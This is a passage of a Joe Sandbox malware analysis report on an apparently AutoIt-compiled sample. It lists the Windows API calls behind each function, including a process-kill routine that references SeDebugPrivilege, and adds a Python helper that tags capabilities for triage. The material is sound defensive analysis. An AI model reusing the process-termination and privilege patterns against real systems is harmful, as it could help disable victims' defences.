                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A16D
                                                                                      • GetLastError.KERNEL32 ref: 00C9A180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9A268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00C9A273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9A2C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: f8f2938022047fa2a6a2646f69726adb5b514847fad3b68b462ebe9ce90672de
                                                                                      • Instruction ID: 7ba9ae32f35acd34ba64c67d0cef97c7864c86ce52419e57f839fcadf9f35ac0
                                                                                      • Opcode Fuzzy Hash: f8f2938022047fa2a6a2646f69726adb5b514847fad3b68b462ebe9ce90672de
                                                                                      • Instruction Fuzzy Hash: CB618F30208641AFDB10DF19C498F59BBE1AF45318F14849CE46A8B7A3C772ED85DBD2
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA3925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CA393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA3954
                                                                                      • _wcslen.LIBCMT ref: 00CA3999
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA39C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA39F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2147712094-78025650
                                                                                      • Opcode ID: e57a9233ab9ec466a4d47bf5eff094f7c74b375b426052c03bca376b1f26a274
                                                                                      • Instruction ID: e2a71e6da2c224cc6d508aff93024528f8a43ac479ea660e99032ff33db5bc8a
                                                                                      • Opcode Fuzzy Hash: e57a9233ab9ec466a4d47bf5eff094f7c74b375b426052c03bca376b1f26a274
                                                                                      • Instruction Fuzzy Hash: F241C571A00259ABDF21DFA4CC45BEE77A9EF09358F100126F954E7281D7759E80CB90
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 00C7BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 00C7BD53
                                                                                      • GetMenuItemCount.USER32(0125EBC0), ref: 00C7BDA4
                                                                                      • InsertMenuItemW.USER32(0125EBC0,?,00000001,00000030), ref: 00C7BDCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: c6026f92ba96bde6e91278721007c04eec4d1a5ed3951e037e1bbd04fea28e60
                                                                                      • Instruction ID: 2c7828588ef46e1aefbac78fb2c6b9850165b144f641617b221f6cb88bf0886f
                                                                                      • Opcode Fuzzy Hash: c6026f92ba96bde6e91278721007c04eec4d1a5ed3951e037e1bbd04fea28e60
                                                                                      • Instruction Fuzzy Hash: 8C519E70A002059FDB21CFA9D8C4BAEBBF8AF65314F14C119F429D7299E770AE40CB51
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00C7C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: 766abd51e050cbefa7670ee58b310f6e92352d146631cb2f736e7bfdc54cfe0a
                                                                                      • Instruction ID: ba686512ad9d0f5baab782692d26b31cdc72da8b929b5da70947680a4188122f
                                                                                      • Opcode Fuzzy Hash: 766abd51e050cbefa7670ee58b310f6e92352d146631cb2f736e7bfdc54cfe0a
                                                                                      • Instruction Fuzzy Hash: C7110D3268930BBAE7055B559CC3DEE679CDF15354F11403FF618A62C2D7706E006365
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C6D3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6D3BF
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C6D3E5
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C6D3FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                      • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                      • API String ID: 582185067-2904798639
                                                                                      • Opcode ID: dc5ff6cdd5c5ba8af3b7d2d841240a46ea8a6369c5a23025057ffce6a6c4cdd2
                                                                                      • Instruction ID: 8cc0e7e36621f18d04acdcbcdf50ee928a6c84f846017b24fa1d8b8fb625bc55
                                                                                      • Opcode Fuzzy Hash: dc5ff6cdd5c5ba8af3b7d2d841240a46ea8a6369c5a23025057ffce6a6c4cdd2
                                                                                      • Instruction Fuzzy Hash: 58F02770F462359BC77157519CE8B6D7334AF01B05F448065F603F7260DB30CE048AA1
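Two of the entries above carry the most triage signal: the Toolhelp32 / OpenProcess / TerminateProcess routine (String ID SeDebugPrivilege) and the kernel32.dll LoadLibraryA / GetProcAddress(GetSystemWow64DirectoryW) probe. The Python below is an added example for this page, not Joe Sandbox code and not code recovered from the sample: it parses "APIs" lines of exactly this shape, decodes the OpenProcess desired-access mask (00000001 = PROCESS_TERMINATE) and tags each function with coarse capability labels. The SAMPLE text is constructed by copying those two entries; the label names and rules are this example's own choices, not Joe Sandbox signature names.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings.

Added example for this report page: not Joe Sandbox code, not code from the
analysed sample. SAMPLE is copied from two function entries of this report;
the capability labels and rules are this example's own choices.
"""
import re

# One API line, with or without an argument list, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A16D
#   • Part of subcall function 00C7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# "String ID: a$b$c" in the Similarity block; '$' separates the strings.
STRING_LINE = re.compile(r"^String ID:\s*(?P<s>.*)$")
HEX = re.compile(r"^[0-9A-Fa-f]{1,8}$")

# Process access rights (winnt.h) for OpenProcess's dwDesiredAccess.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_process_access(mask):
    """Return the names of the PROCESS_* rights set in an OpenProcess mask."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def parse_entries(report_text):
    """Split the listing into entries, one per 'APIs' header, keeping each
    entry's API calls (subcall lines included) and its String ID values."""
    entries, cur = [], None
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = {"calls": [], "strings": []}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.search(line)
        if m:
            call = m.groupdict()
            call["args"] = [a.strip() for a in call["args"].split(",")] if call["args"] else []
            cur["calls"].append(call)
            continue
        m = STRING_LINE.match(line)
        if m and m.group("s"):
            cur["strings"].extend(s for s in m.group("s").split("$") if s)
    return entries


def classify(entry):
    """Tag an entry with coarse capabilities derived from its API set and
    from the decoded OpenProcess access mask (labels are this example's own)."""
    apis = {c["api"] for c in entry["calls"]}
    rights = []
    for c in entry["calls"]:
        if c["api"] == "OpenProcess" and c["args"] and HEX.match(c["args"][0]):
            rights = decode_process_access(int(c["args"][0], 16))
    caps = []
    if "CreateToolhelp32Snapshot" in apis and apis & {"Process32First", "Process32FirstW"}:
        caps.append("process-enumeration")
    if "TerminateProcess" in apis and "PROCESS_TERMINATE" in rights:
        caps.append("process-termination")
    if apis & {"LoadLibraryA", "LoadLibraryW"} and "GetProcAddress" in apis:
        caps.append("dynamic-import")
    probes = {"GetSystemWow64DirectoryW", "IsWow64Process", "GetNativeSystemInfo"}
    if apis & probes or any(c["api"] == "GetProcAddress" and probes & set(c["args"])
                            for c in entry["calls"]):
        caps.append("wow64-arch-probe")
    if "SeDebugPrivilege" in entry["strings"]:
        caps.append("sedebugprivilege-string")
    return {"capabilities": caps, "open_process_rights": rights}


def summarize(report_text):
    """Classify every entry in a listing, in report order."""
    return [classify(e) for e in parse_entries(report_text)]


# Constructed input: the two entries from this report, trimmed to the lines the parser uses.
SAMPLE = """\
APIs
  • Part of subcall function 00C7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
  • Part of subcall function 00C7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C7D50F
  • Part of subcall function 00C7D4DC: CloseHandle.KERNEL32(00000000), ref: 00C7D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9A16D
• GetLastError.KERNEL32 ref: 00C9A180
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9A268
• CloseHandle.KERNEL32(00000000), ref: 00C9A2C4
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C6D3AD
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6D3BF
• FreeLibrary.KERNEL32(00000000), ref: 00C6D3E5
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C6D3FC
Similarity
• String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
"""

if __name__ == "__main__":
    for entry, tags in zip(parse_entries(SAMPLE), summarize(SAMPLE)):
        print(sorted({c["api"] for c in entry["calls"]}), tags)
```

One caveat when reading the tags: the overview classifies this binary as a likely compiled AutoIt script, and both sequences are consistent with the AutoIt runtime's own built-ins (a process-close routine that enables SeDebugPrivilege before OpenProcess/TerminateProcess, and an architecture probe that looks up GetSystemWow64DirectoryW to decide between X86 and X64). A capability tag on these functions therefore says what the interpreter can do, not what the embedded script actually does; corroborate with the behavioural sections of the report before treating it as an indicator.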
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$LocalTime
                                                                                      • String ID:
                                                                                      • API String ID: 952045576-0
                                                                                      • Opcode ID: 5decba3f534bc3102807fb4e01f40023d6f4c014888e9e653b73b314904bbc46
                                                                                      • Instruction ID: cd9475c3a134fbe95ea042d1655e2d1492bdcebd75af878cfd68192b1d222e48
                                                                                      • Opcode Fuzzy Hash: 5decba3f534bc3102807fb4e01f40023d6f4c014888e9e653b73b314904bbc46
                                                                                      • Instruction Fuzzy Hash: 4A419366C2021875CB11EBF4C88AACFB7ACAF49710F508962F518E3121FB35E655C3A6
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C2F953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C6F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00C6F454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: f513e7348c62dc5316ceba69ebbb2a19c1301ce6e6046ef91f3830d152474229
                                                                                      • Instruction ID: c837cfa8e49f02a3792685daf80fa939e39b40f2da5ab7f1859378aeb65d8905
                                                                                      • Opcode Fuzzy Hash: f513e7348c62dc5316ceba69ebbb2a19c1301ce6e6046ef91f3830d152474229
                                                                                      • Instruction Fuzzy Hash: C6412C31608698BAC738AB2EB8C873E7BB1AB56314F14443CE09757D61CA719AC3D710
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00CA2D1B
                                                                                      • GetDC.USER32(00000000), ref: 00CA2D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA2D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00CA2D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CA2D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA2D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CA5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA2DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA2DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: a4a6a0c544bd4e8334224b536dac4192eed612231f7b1eb83db6214986056e62
                                                                                      • Instruction ID: 0fb0b192d7fdc5515736e2de706bde06d2892b36f6b7261c6b4282221677862d
                                                                                      • Opcode Fuzzy Hash: a4a6a0c544bd4e8334224b536dac4192eed612231f7b1eb83db6214986056e62
                                                                                      • Instruction Fuzzy Hash: 6B314C72201224BFEB118F54CC8AFEB3BA9EF0A759F044055FE089B291D6759D51CBA4
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: 7eee89c95325a95b595f949d64401df41a4bf99667ea7631d80a5f0de7e0e15f
                                                                                      • Instruction ID: 90a9bfa523fe7cb66ba7d0a37d232a69eef724b474a6ad45410f0a9cacac4feb
                                                                                      • Opcode Fuzzy Hash: 7eee89c95325a95b595f949d64401df41a4bf99667ea7631d80a5f0de7e0e15f
                                                                                      • Instruction Fuzzy Hash: 8F210BA1750A0A7BD21855228D82FFB335CAF21398F488034FD1C9A781FBB1EF1195E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: f75ba5c51520c13010fc85bfd8df4b89ded5d80fcf46c404ecaebbf90d4c1117
                                                                                      • Instruction ID: a381865ba70646c0a07ffb658e34be84c216466532cf3f7af73067c68a104e51
                                                                                      • Opcode Fuzzy Hash: f75ba5c51520c13010fc85bfd8df4b89ded5d80fcf46c404ecaebbf90d4c1117
                                                                                      • Instruction Fuzzy Hash: 05D1D471A0060A9FDF11CFA8C889FAEB7B5FF48344F148169E925AB291E770DE45CB50
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C515CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C517FB,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C516E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C516FB
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51777
                                                                                      • __freea.LIBCMT ref: 00C517A2
                                                                                      • __freea.LIBCMT ref: 00C517AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2829977744-0
                                                                                      • Opcode ID: dcf1bf6a3eb61a1a99653380de49a234ade551a56d5b55b11ae339aaf4b017d3
                                                                                      • Instruction ID: 1e9a8bf1f542ec26c4663785e48b04e8f2e52d87f997a7382f88a717da6ef88d
                                                                                      • Opcode Fuzzy Hash: dcf1bf6a3eb61a1a99653380de49a234ade551a56d5b55b11ae339aaf4b017d3
                                                                                      • Instruction Fuzzy Hash: 5191B379E002069ADB208E64C889BEE7BA5EB49351F5C0659EC11E7141EB35DE88C768
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 2371f05799ba08094c82d978fccd116141158e5a6d4fab16ff7ae6701cbd94a5
                                                                                      • Instruction ID: ae68826186965a194104b15d499114c54d13d503ffbf55311975ad511aaee550
                                                                                      • Opcode Fuzzy Hash: 2371f05799ba08094c82d978fccd116141158e5a6d4fab16ff7ae6701cbd94a5
                                                                                      • Instruction Fuzzy Hash: 7C919471A00219ABDF28CFA5D888FAE7BB8EF46715F108559F515AB280D7709942CFA0
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C8125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C812A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C812D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C8135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C813C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C81430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
